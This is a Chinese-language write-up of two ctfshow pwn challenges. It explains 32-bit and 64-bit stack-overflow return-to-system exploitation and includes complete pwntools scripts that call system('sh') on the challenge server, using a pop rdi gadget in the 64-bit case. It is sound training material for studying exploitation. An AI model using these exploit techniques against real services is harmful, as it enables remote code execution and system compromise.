pwn41
我们首先将pwn文件下载下来,拖入到虚拟机查看一下文件的保护信息。
chmod +x pwn
checksec pwn
该文件只开启了栈不可执行,并且文件是32位的。
我们把文件托到ida32中查看一下反编译代码。
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
logo(&argc);
ctfshow();
puts("\nExit");
return 0;
}
ssize_t ctfshow()
{
char buf[14]; // [esp+6h] [ebp-12h] BYREF
return read(0, buf, 0x32u);
}
int hint()
{
system("echo flag");
return 0;
}
int useful()
{
return printf("sh");
}
先简单说下这道题的思路,首先ctfshow函数中buf数组长度为14,却需要读入0x32个长度的数据,显然存在栈溢出。其次我们还可以注意到,hint函数中存在system函数,我们可以plt表中获取system函数的地址,然后再从useful函数获取到sh的地址,这样就可以拼凑处system(“sh”),进而拿到服务器的shell。
编写exp
计算溢出长度
从ctfshow函数中可以看到,buf在栈中的位置在ebp上面12h处,加上ebp本身所占栈单元的4个字节,那么栈溢出的长度就为0x12h+0x4h
拿到system函数的地址
使用objdump命令获取文件的plt表,从而直接拿到system函数的地址。
objdump -d -j .plt pwn
system函数的地址为:0x080483d0
拿到sh的地址
直接在ida中点击sh,可以直接跳转到data段从而拿到sh的地址。
sh的地址为:0x080487BA
写exp.py
from pwn import *
io = remote("pwn.challenge.ctf.show", "28160")
offset = 0x12 + 0x4
system_addr = 0x080483d0
sh_addr = 0x080487BA
payload = offset * 'a'
payload += p32(system_addr)
payload += 'a' * 4 # 表示system函数的返回地址,由于不需要返回到某个地方,所以用4个字节顶替
payload += p32(sh_addr)
io.sendline(payload)
io.interactive()
成功拿到flag。
pwn42
首先我们还是先将文件下载下来,托到虚拟机查看保护信息。
chmod +x pwn
checksec pwn
文件的保护信息与上道题目几乎一样,开启了栈不可执行,只不过这个文件是64位的。那我们就先把他拖进到ida64中查看他的反编译代码。
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
logo();
ctfshow();
puts("\nExit");
return 0;
}
ssize_t ctfshow()
{
char buf[10]; // [rsp+6h] [rbp-Ah] BYREF
return read(0, buf, 0x32uLL);
}
__int64 hint()
{
system("echo flag");
return 0LL;
}
int useful()
{
return printf("sh");
}
这道题的代码几乎跟上道题也是差不多的,还是一样的思路,利用ctfshow函数中buf的栈溢出,通过hint函数的system函数与useful函数的sh相结合拼凑成system(sh)来获得shell。
只不过在64位中,需要堆栈平衡 ,并且64位的传参和32位也不一样。
具体64位传参方式如下:
当参数少于7个时, 参数从左到右放⼊寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时, 前 6 个与前⾯⼀样, 但后⾯的依次从 “右向左” 放⼊栈中,和32位汇编⼀样。
编写exp
计算溢出长度
首先可以观察到,buf在栈中的位置在rbp上面Ah处,加上rbp本身所占栈单元的长度为8(32位为4,64位为8),那么溢出长度就为0xa + 0x8
拿到system函数的地址
还是通过使用objdump命令来获得文件的plt表从而拿到system函数的地址。
objdump -d -j .plt pwn
system函数的地址为:0x0000000000400560
拿到sh的函数地址
直接在ida中点击sh,即可跳转到data段,就可以获得sh的地址了。
sh的地址为:0x0000000000400872
拿到pop rdi;ret和ret的地址
pop rdi,把参数pop到rdi寄存器中,再通过ret将程序的执行流控制到我们在栈中传入的恶意地址。
ROPgadget --binary pwn --only "pop|ret"
pop rdi;ret的地址为:0x0000000000400843
ret的地址为:0x000000000040053e
ret是为了64位的堆栈平衡,具体堆栈平衡的知识可以看一下两篇文章
https://www.cnblogs.com/ZIKH26/articles/15996874.html
https://blog.csdn.net/hu_c_t_f/article/details/131902515
写exp.py
from pwn import *
io = remote("pwn.challenge.ctf.show", "28142")
offset = 0xa + 0x8
pop_rdi = 0x0000000000400843
ret = 0x000000000040053e
sh_addr = 0x0000000000400872
system_addr = 0x0000000000400560
payload = offset * 'a'
payload += p64(pop_rdi)
payload += p64(sh_addr)
payload += p64(ret)
payload += p64(system_addr)
io.sendline(payload)
io.interactive()
成功拿到flag。
